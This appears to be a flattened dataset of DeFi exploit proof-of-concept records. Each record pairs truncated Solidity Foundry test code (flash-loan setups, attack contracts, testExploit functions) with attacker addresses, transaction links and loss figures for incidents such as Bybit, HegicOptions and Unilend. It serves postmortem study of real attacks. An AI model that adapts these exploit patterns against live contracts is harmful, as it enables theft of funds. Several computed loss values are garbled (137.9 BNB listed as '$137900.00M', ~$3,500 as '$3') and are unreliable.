// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~228591 USD$ // Attacker : https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959 // Attack Contract : https://etherscan.io/address/0xb2e855411f67378c08...
exploit_poc
Astrid
2023-10
Astrid_exp.sol
null
23b69fdbd6e6eb66
2026-01-07T10:59:16.543211
postmortems
ethereum
18,448,167
~228591 USD$
228,591
https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959
https://etherscan.io/address/0xb2e855411f67378c08f47401eacff37461e16188
https://etherscan.io/address/0xbAa87546cF87b5De1b0b52353A86792D40b8BA70
https://etherscan.io/tx/0x8af9b5fb3e2e3df8659ffb2e0f0c1f4c90d5a80f4f6fccef143b823ce673fb60
null
null
true
true
false
high
~228591 USD$
unknown
function testExpolit() public { address[] memory stakedTokens = new address[](3); stakedTokens[0] = address(stETH); stakedTokens[1] = address(rETH); stakedTokens[2] = address(cbETH); deal(address(this), 0); uint256[] memory balances = new uint256[](3); emit log_na...
true
~228591 USD$
https://etherscan.io/address/0x792ec27874e1f614e757a1ae49d00ef5b2c73959
https://etherscan.io/address/0xb2e855411f67378c08f47401eacff37461e16188
https://etherscan.io/address/0xbAa87546cF87b5De1b0b52353A86792D40b8BA70
https://etherscan.io/tx/0x8af9b5fb3e2e3df8659ffb2e0f0c1f4c90d5a80f4f6fccef143b823ce673fb60
$228.6K
8.89
high
Astrid Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.20; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~83,994 USD$ // Attacker : https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04 // Attack Contract : https://etherscan.io/address/0x2b326a17b5ef826fa...
exploit_poc
UniBot
2023-10
UniBot_exp.sol
null
102f808e67724a52
2026-01-07T10:59:16.543274
postmortems
ethereum
18,467,805
~83,994 USD$
83
https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04
https://etherscan.io/address/0x2b326a17b5ef826fa4e17d3836364ae1f0231a6f
null
null
null
null
true
true
false
low
~83,994 USD$
unknown
function testExploit() public { emit log_named_decimal_uint( "Attacker UniBot balance before exploit", UniBot.balanceOf(address(this)), UniBot.decimals() ); address[] memory victims = new address[](17); victims[0] = 0xA20Cb17D888b7E426A3a7Ca2E583706dE48a04f3; victim...
true
https://etherscan.io/address/0x413e4fb75c300b92fec12d7c44e4c0b4faab4d04
https://etherscan.io/address/0x2b326a17b5ef826fa4e17d3836364ae1f0231a6f
$83
5.88
medium
UniBot Exploit (2023-10)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~104M // Attacker : https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8 // Attack Contract : https://etherscan.io/address/0xF51E888616a123875EAf7AFd441...
exploit_poc
HegicOptions
2025-02
HegicOptions_exp.sol
null
1e0bf2f3d47c72d6
2026-01-07T10:59:16.543328
postmortems
ethereum
null
~104M
104,000,000
https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8
https://etherscan.io/address/0xF51E888616a123875EAf7AFd4417fbc4111750f7
https://etherscan.io/address/0x7094E706E75E13D1E0ea237f71A7C4511e9d270B
null
null
null
true
true
false
critical
~104M
unknown
function testExploit() public { // The attacker initially deposited 0.0025 WBTC into the victim contract. // Tx: 0x9c27d45c1daa943ce0b92a70ba5efa6ab34409b14b568146d2853c1ddaf14f82 vm.startPrank(attacker_address, attacker_address); // Attack Tx 1 vm.createSelectFork("ma...
true
~104M
https://etherscan.io/address/0x4B53608fF0cE42cDF9Cf01D7d024C2c9ea1aA2e8
https://etherscan.io/address/0xF51E888616a123875EAf7AFd4417fbc4111750f7
https://etherscan.io/address/0x7094E706E75E13D1E0ea237f71A7C4511e9d270B
$104.00M
6.44
medium
HegicOptions Exploit (2025-02)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ $3,500 // Attacker : https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf // Attack Tx : https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe...
exploit_poc
PeapodsFinance
2025-02
PeapodsFinance_exp.sol
null
0f12aca1870c3966
2026-01-07T10:59:16.543379
postmortems
ethereum
21,800,591
~ $3,500
3
https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
null
null
https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe1cfc1213f20e91d91ce3b55c86cc5
https://blog.solidityscan.com/peapods-finance-hack-analysis-bdc5432107a5
null
true
true
false
low
~ $3,500
unknown
function testExploit() public { emit log_named_decimal_uint("Before balance of pOHM", IERC20(pOHM).balanceOf(attacker), 18); vm.startPrank(attacker); AttackerC attC = new AttackerC(attacker); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("After balance of p...
true
~ $3,500
https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
https://etherscan.io/tx/0x2c1a19982aa88bee8a5d9a5dfeb406f2bfe1cfc1213f20e91d91ce3b55c86cc5
https://blog.solidityscan.com/peapods-finance-hack-analysis-bdc5432107a5
$3
6.84
medium
PeapodsFinance Exploit (2025-02)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 6700 USD // Attacker : https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc // Attack Contract : https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5 // Vulnerable Contract :...
exploit_poc
unverified_35bc
2025-02
unverified_35bc_exp.sol
null
6c6931a2f37df821
2026-01-07T10:59:16.543434
postmortems
bsc
46,886,078
6700 USD
6,700
https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc
https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5
https://bscscan.com/address/0xde91e6e937ec344e5a3c800539c41979c2d85278
https://app.blocksec.com/explorer/tx/bsc/0xd7a61b07ca4dc5966d00b3cc99b03c6ab2cee688fa13b30bea08f5142023777d
https://x.com/TenArmorAlert/status/1893333680417890648
https://x.com/TenArmorAlert/status/1893333680417890648
true
true
false
low
6700 USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC{value: 0.6 ether}(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance ...
true
6700 USD
https://bscscan.com/address/0xd75652ada2f6a140f2ffcd7cd20f34c21fbc3fbc
https://bscscan.com/address/0x0a2f4da966319c14ee4c9f1a2bf04fe738df3ce5
https://bscscan.com/address/0xde91e6e937ec344e5a3c800539c41979c2d85278
https://app.blocksec.com/explorer/tx/bsc/0xd7a61b07ca4dc5966d00b3cc99b03c6ab2cee688fa13b30bea08f5142023777d
https://x.com/TenArmorAlert/status/1893333680417890648
https://x.com/TenArmorAlert/status/1893333680417890648
$6.7K
7.68
medium
unverified_35bc Exploit (2025-02)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import {IERC20} from "../interface.sol"; // @KeyInfo - Total Lost : 1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH) // Attacker : https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e // Attack Contra...
exploit_poc
Bybit
2025-02
Bybit_exp.sol
null
24df6430a21cd79f
2026-01-07T10:59:16.543517
postmortems
ethereum
null
1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH)
1,500,000,000
https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e
null
null
null
https://x.com/zachxbt/status/1893211577836302365
https://x.com/SlowMist_Team/status/1892963250385592345
true
true
false
critical
1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH)
unknown
function testExploit() public { console.log("Real exploit start......"); // Print slot 0 of bybit cold wallet 1 // slot 0 stores masterCopy(address) console.log( "Before attack, Bybit cold wallet 1 masterCopy:", address(uint160(uint256(vm.load(bybitColdWallet1, by...
true
1.5B (401346 ETH + 8000 mETH + 15000 cmETH + 90375 stETH)
https://etherscan.io/address/0x0fa09c3a328792253f8dee7116848723b72a6d2e
https://x.com/zachxbt/status/1893211577836302365
https://x.com/SlowMist_Team/status/1892963250385592345
$1500.00M
7
medium
Bybit Exploit (2025-02)
true
false
false
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 15.2k USD // Attacker : 0x8149f77504007450711023cf0ec11bdd6348401f // Attack Contract : https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841 // Vulnerable Contract : https://bscscan.com/addres...
exploit_poc
unverified_d4f1
2025-02
unverified_d4f1_exp.sol
null
51cd287dc2b65d1c
2026-01-07T10:59:16.543604
postmortems
bsc
46,681,362
15.2k USD
15,200
null
https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841
https://bscscan.com/address/0xd4f1afd0331255e848c119ca39143d41144f7cb3
https://app.blocksec.com/explorer/tx/bsc/0xc7fc7e066ec2d4ea659061b75308c9016c0efab329d1055c2a8d91cc11dc3868
https://x.com/TenArmorAlert/status/1890776122918309932
https://x.com/TenArmorAlert/status/1890776122918309932
true
true
false
medium
15.2k USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(attC), 23.007026290916617 ether); vm.stopPrank(); emit log_named...
true
15.2k USD
https://bscscan.com/address/0x009e64c02848dc51aa3f46775c2cfbf1190c2841
https://bscscan.com/address/0xd4f1afd0331255e848c119ca39143d41144f7cb3
https://app.blocksec.com/explorer/tx/bsc/0xc7fc7e066ec2d4ea659061b75308c9016c0efab329d1055c2a8d91cc11dc3868
https://x.com/TenArmorAlert/status/1890776122918309932
https://x.com/TenArmorAlert/status/1890776122918309932
$15.2K
7.11
medium
unverified_d4f1 Exploit (2025-02)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 137.9 BNB // Original Attacker : https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5 // Attack Contract(Init) : https://bscscan.com/address/0xd4c80700ca...
exploit_poc
StepHeroNFTs
2025-02
StepHeroNFTs_exp.sol
null
31612644bcaa6262
2026-01-07T10:59:16.543653
postmortems
bsc
46,843,424
137.9 BNB
137,900,000,000
https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5
null
https://bscscan.com/address/0x9823E10A0bF6F64F59964bE1A7f83090bf5728aB
https://bscscan.com/tx/0xef386a69ca6a147c374258a1bf40221b0b6bd9bc449a7016dbe5240644581877
null
null
true
false
false
critical
137.9 BNB
unknown
function testPoC() public { vm.startPrank(attacker); new AttackerC(attacker); emit log_named_decimal_uint("Profit in BNB", attacker.balance, 18); } } contract AttackerC { constructor (address to) { AttackerC1 attC1 = new AttackerC1(); attC1.attack(to); } }...
true
137.9 BNB
https://bscscan.com/address/0xFb1cc1548D039f14b02cfF9aE86757Edd2CDB8A5
https://bscscan.com/address/0x9823E10A0bF6F64F59964bE1A7f83090bf5728aB
https://bscscan.com/tx/0xef386a69ca6a147c374258a1bf40221b0b6bd9bc449a7016dbe5240644581877
$137900.00M
7.72
medium
StepHeroNFTs Exploit (2025-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import {IERC20, WETH} from "../interface.sol"; // @KeyInfo - Total Lost : 186k (287bnb) // Attacker 1: https://bscscan.com/address/0x010Fc97CB0a4D101dCe20DAB37361514bD59A53A // Attacker 2: https://bscscan.com/address/0x935d6cf07...
exploit_poc
FourMeme
2025-02
FourMeme_exp.sol
null
69868c933b56d717
2026-01-07T10:59:16.543729
postmortems
bsc
null
186k (287bnb)
186,000
null
null
null
null
https://securrtech.medium.com/the-four-meme-exploit-a-deep-dive-into-the-183-000-hack-6f45369029be
https://x.com/four_meme_/status/1889198796695044138
true
true
false
high
186k (287bnb)
unknown
function testExploit() public balanceLog { // Preparation buyMemeToken(); // User can only get meme token from four.meme platform during this stage HackerCreatePool(); // Hacker create a pool with extremely high sqrtPriceX96 CreatePool(); // When the market capitalization of the memecoin...
true
186k (287bnb)
https://securrtech.medium.com/the-four-meme-exploit-a-deep-dive-into-the-183-000-hack-6f45369029be
https://x.com/four_meme_/status/1889198796695044138
$186.0K
7
medium
FourMeme Exploit (2025-02)
true
false
false
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; // PoC is incomplete, not sure why but Hardhat and JS gave me a severe headache ¯\_(ツ)_/¯ /* Attack tx: https://etherscan.io/tx/0x0af5a6d2d8b49f68dcfd4599a0e767450e76e08a5aeba9b3d534a604d308e60b Post Mortems: https://cmichel...
exploit_poc
Sushi_Badger_Digg
2021-01
Sushi_Badger_Digg_exp.sol
null
bda5eadecd9b7893
2026-01-07T10:59:16.543851
postmortems
ethereum
11,720,049
null
null
null
null
null
https://etherscan.io/tx/0x0af5a6d2d8b49f68dcfd4599a0e767450e76e08a5aeba9b3d534a604d308e60b
null
null
false
false
false
medium
null
unknown
false
Unknown
4
low
Sushi_Badger_Digg Exploit (2021-01)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // reason : Use pair balance to calculate the reward,and not update the time correctly,so can claim reward more times. // guy : https://x.com/TenArmorAlert/status/1877030261067571234 // tx : ...
exploit_poc
LPMine
2025-01
LPMine_exp.sol
flash_loan
6f19b1e490b8bc05
2026-01-07T10:59:16.543925
postmortems
unknown
45,583,892
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
3.26
low
LPMine Exploit (2025-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 65K US$ // Attacker : 0x56f77AdC522BFfebB3AF0669564122933AB5EA4f // Attack Contract : 0xaaE196b6E3f3Ee34405e857e7bfb05D74c5cf775 // Vulnerable Contract : 0xc10E0319337c...
exploit_poc
Ast
2025-01
Ast_exp.sol
null
c82af717a22ec743
2026-01-07T10:59:16.544011
postmortems
bsc
45,964,639
65K US$
65,000
null
null
null
https://bscscan.com/tx/0x80dd9362d211722b578af72d551f0a68e0dc1b1e077805353970b2f65e793927
null
null
true
true
false
medium
65K US$
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker BUSD balance before flash", IERC20(busd).balanceOf(address(this)), 18); address recipient = address(this); uint256 amount1 = 0; bytes memory data = abi.encode(busd_amount); // 调用闪电贷,贷款3000万个BUSD ...
true
65K US$
https://bscscan.com/tx/0x80dd9362d211722b578af72d551f0a68e0dc1b1e077805353970b2f65e793927
$65.0K
7.52
medium
Ast Exploit (2025-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // Happy New Year // @KeyInfo - Total Lost : 12.340357077284305206 ETH (~$41.2K USD) // Attacker : https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36 // Attack Contract 0 : http...
exploit_poc
LAURAToken
2025-01
LAURAToken_exp.sol
flash_loan
429e0ac30146375b
2026-01-07T10:59:16.544074
postmortems
ethereum
21,529,888
12.340357077284305206 ETH (~$41.2K USD)
12.340357
https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36
null
https://etherscan.io/token/0x05641e33fd15baf819729df55500b07b82eb8e89
https://etherscan.io/tx/0xef34f4fdf03e403e3c94e96539354fb4fe0b79a5ec927eacc63bc04108dbf420
null
null
true
false
true
low
12.340357077284305206 ETH (~$41.2K USD)
flash-loan
function testPoC() public { vm.startPrank(attacker); AttackerC0 attC0 = new AttackerC0(); console.log("Final balance in ETH :", address(attC0).balance); } } contract AttackerC0 { constructor () { AttackerC1 attC1 = new AttackerC1(); // L01 attC1.attack();// L04 } ...
true
12.340357077284305206 ETH (~$41.2K USD)
https://etherscan.io/address/0x25869347f7993c50410a9b9b9c48f37d79e12a36
https://etherscan.io/token/0x05641e33fd15baf819729df55500b07b82eb8e89
https://etherscan.io/tx/0xef34f4fdf03e403e3c94e96539354fb4fe0b79a5ec927eacc63bc04108dbf420
$12
10
high
LAURAToken Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 19K // Attacker : https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5 // Attack Contract : https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a // Vulnerable Contra...
exploit_poc
Mosca
2025-01
Mosca_exp.sol
null
9cd71db65e02d1b1
2026-01-07T10:59:16.544137
postmortems
bsc
null
19K
19,000
https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5
https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a
https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d
https://bscscan.com/tx/0x4e5bb7e3f552f5ee6ee97db9a9fcf07287aae9a1974e24999690855741121aff
null
null
true
true
false
medium
19K
unknown
function testExploit() public balanceLog { IERC20(USDC).approve(MOSCA, type(uint256).max); uint256 amount = 30_000_000_000_000_000_000; uint256 refCode = 0; uint8 fiat = 2; bool enterpriseJoin = false; IMosca(MOSCA).join(amount, refCode, fiat, enterpriseJoin); a...
true
19K
https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5
https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a
https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d
https://bscscan.com/tx/0x4e5bb7e3f552f5ee6ee97db9a9fcf07287aae9a1974e24999690855741121aff
$19.0K
7.3
medium
Mosca Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 21.5K // Attacker : https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8 // Attack Contract : https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7 // Vulnerable Cont...
exploit_poc
JPulsepot
2025-01
JPulsepot_exp.sol
null
673f41073d5ae68f
2026-01-07T10:59:16.544188
postmortems
bsc
null
21.5K
21,500
https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8
https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7
https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e
https://bscscan.com/tx/0xd6ba15ecf3df9aaae37450df8f79233267af41535793ee1f69c565b50e28f7da
null
https://x.com/CertiKAlert/status/1877662352834793639
true
true
false
medium
21.5K
unknown
function testExploit() public balanceLog { //implement exploit code here address recipient = address(this); uint256 amount0 = 0; uint256 amount1 = 4_300_000_000_000_000_000_000; bytes memory data = abi.encode(amount1); IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount...
true
21.5K
https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8
https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7
https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e
https://bscscan.com/tx/0xd6ba15ecf3df9aaae37450df8f79233267af41535793ee1f69c565b50e28f7da
https://x.com/CertiKAlert/status/1877662352834793639
$21.5K
7.55
medium
JPulsepot Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~28K // Attacker : https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80 // Attack Contract : https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133 // Vulnerable Contr...
exploit_poc
RoulettePotV2
2025-01
RoulettePotV2_exp.sol
null
27848b9080f7f00f
2026-01-07T10:59:16.544236
postmortems
bsc
null
~28K
28,000
https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80
https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133
https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f
https://bscscan.com/tx/0xd9e0014a32d96cfc8b72864988a6e1664a9b6a2e90aeaa895fcd42da11cc3490
null
https://x.com/TenArmorAlert/status/1878008055717376068
true
true
false
medium
~28K
unknown
function testExploit() public balanceLog { address recipient = PancakeSwap; uint256 amount0 = 0; uint256 amount1 = 4_203_732_130_200_000_000_000; bytes memory data = abi.encode(amount1); IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount0, amount1, data); }
true
~28K
https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80
https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133
https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f
https://bscscan.com/tx/0xd9e0014a32d96cfc8b72864988a6e1664a9b6a2e90aeaa895fcd42da11cc3490
https://x.com/TenArmorAlert/status/1878008055717376068
$28.0K
7.41
medium
RoulettePotV2 Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 97 stETH // Attacker : https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101 // Attack Contract : https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58...
exploit_poc
IdolsNFT
2025-01
IdolsNFT_exp.sol
null
52467dbf83596a5b
2026-01-07T10:59:16.544285
postmortems
ethereum
null
97 stETH
97
https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101
https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58842d6e74e3b16
https://etherscan.io/address/0x439cac149b935ae1d726569800972e1669d17094
https://etherscan.io/tx/0x5e989304b1fb61ea0652db4d0f9476b8882f27191c1f1d2841f8977cb8c5284c
https://rekt.news/theidolsnft-rekt
https://x.com/TenArmorAlert/status/1879376744161132981
true
true
false
low
97 stETH
unknown
function testExploit() public balanceLog { address contractAddress = vm.computeCreateAddress(address(this), vm.getNonce(address(this))); vm.prank(ATTACKER); IIDOLS(IDOLS_NFT).safeTransferFrom(ATTACKER, contractAddress, TOKEN_ID); new AttackContract(); // This process repeated ...
true
97 stETH
https://etherscan.io/address/0xe546480138d50bb841b204691c39cc514858d101
https://etherscan.io/address/0x22d22134612c0741ebdb3b74a58842d6e74e3b16
https://etherscan.io/address/0x439cac149b935ae1d726569800972e1669d17094
https://etherscan.io/tx/0x5e989304b1fb61ea0652db4d0f9476b8882f27191c1f1d2841f8977cb8c5284c
https://rekt.news/theidolsnft-rekt
https://x.com/TenArmorAlert/status/1879376744161132981
$97
7.68
medium
IdolsNFT Exploit (2025-01)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 37.6K // Attacker : https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419 // Attack Contract : https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54 // Vulnerable Cont...
exploit_poc
Mosca2
2025-01
Mosca2_exp.sol
flash_loan
24cfab6d0530ce6c
2026-01-07T10:59:16.544331
postmortems
bsc
null
37.6K
37,600
https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419
https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54
https://bscscan.com/address/0xd8791f0c10b831b605c5d48959eb763b266940b9
https://bscscan.com/tx/0xf13d281d4aa95f1aca457bd17f2531581b0ce918c90905d65934c9e67f6ae0ec
null
null
true
true
true
medium
37.6K
flash-loan
function testExploit() public balanceLog { uint256 baseAmount = 0; uint256 quoteAmonut = 7_000_000_000_000_000_000_000; address assetTo = address(this); bytes memory data = abi.encode("0xdead"); IDODO(DPP).flashLoan(baseAmount, quoteAmonut, assetTo, data); }
true
37.6K
https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419
https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54
https://bscscan.com/address/0xd8791f0c10b831b605c5d48959eb763b266940b9
https://bscscan.com/tx/0xf13d281d4aa95f1aca457bd17f2531581b0ce918c90905d65934c9e67f6ae0ec
$37.6K
8.44
high
Mosca2 Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 14.8 WBNB // Attacker : https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF // Attack Contract : https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDb...
exploit_poc
HORS
2025-01
HORS_exp.sol
null
a2e53da1afb97ddf
2026-01-07T10:59:16.544380
postmortems
bsc
null
14.8 WBNB
14.8
https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF
https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDbaD1D5e76524E
https://bscscan.com/address/0x6f3390c6C200e9bE81b32110CE191a293dc0eaba
https://bscscan.com/tx/0xc8572846ed313b12bf835e2748ff37dacf6b8ee1bab36972dc4ace5e9f25fed7
null
https://x.com/TenArmorAlert/status/1877032470098428058
true
true
false
low
14.8 WBNB
unknown
function testExploit() public balanceLog { //implement exploit code here AttackContract attackContract = new AttackContract(); attackContract.attack(); } } contract AttackContract { address public attacker; constructor() { attacker = msg.sender; }
true
14.8 WBNB
https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF
https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDbaD1D5e76524E
https://bscscan.com/address/0x6f3390c6C200e9bE81b32110CE191a293dc0eaba
https://bscscan.com/tx/0xc8572846ed313b12bf835e2748ff37dacf6b8ee1bab36972dc4ace5e9f25fed7
https://x.com/TenArmorAlert/status/1877032470098428058
$15
7.8
medium
HORS Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // reason : To pump the price ,every sell will burn pairs token, that is terrible! // guy : https://x.com/TenArmorAlert/status/1876663900663370056 // tx : https://app.blocksec.com/explorer/tx...
exploit_poc
IPC
2025-01
IPC_exp.sol
flash_loan
2c98998c2dd63f7b
2026-01-07T10:59:16.544443
postmortems
unknown
45,561,316
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
3.14
low
IPC Exploit (2025-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // reason : Unprotected public function // guy : https://x.com/TenArmorAlert/status/1875462686353363435 // tx : https://app.blocksec.com/explorer/tx/bsc/0x61da5b502a62d7e9038d73e31ceb39350504...
exploit_poc
98Token
2025-01
98Token_exp.sol
null
ef40858e32b7da3e
2026-01-07T10:59:16.544500
postmortems
unknown
45,462,898
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.07
low
98Token Exploit (2025-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 60 stETH // Attacker : https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33 // Attack Contract : https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d8...
exploit_poc
Unilend
2025-01
Unilend_exp.sol
flash_loan
982262718d714417
2026-01-07T10:59:16.544546
postmortems
ethereum
null
60 stETH
60
https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33
https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d85971dfa6fda21
https://etherscan.io/address/0x4e34dd25dbd367b1bf82e1b5527dbbe799fad0d0
https://etherscan.io/tx/0x44037ffc0993327176975e08789b71c1058318f48ddeff25890a577d6555b6ba
https://slowmist.medium.com/analysis-of-the-unilend-hack-90022fa35a54
https://x.com/SlowMist_Team/status/1878651772375572573
true
true
true
low
60 stETH
flash-loan
function testExploit() public balanceLog { // Step 1: attacker pledged 200 USDC to the UnilendV2Pool // https://app.blocksec.com/explorer/tx/eth/0xdaf42127499f878b62fc5ba2103135de1c36e1646487cee309c077296814f5ff // Step 2: transfer the 150,237,398 USDC lendShares to the attack contract ...
true
60 stETH
https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33
https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d85971dfa6fda21
https://etherscan.io/address/0x4e34dd25dbd367b1bf82e1b5527dbbe799fad0d0
https://etherscan.io/tx/0x44037ffc0993327176975e08789b71c1058318f48ddeff25890a577d6555b6ba
https://slowmist.medium.com/analysis-of-the-unilend-hack-90022fa35a54
https://x.com/SlowMist_Team/status/1878651772375572573
$60
10
high
Unilend Exploit (2025-01)
true
true
true
true
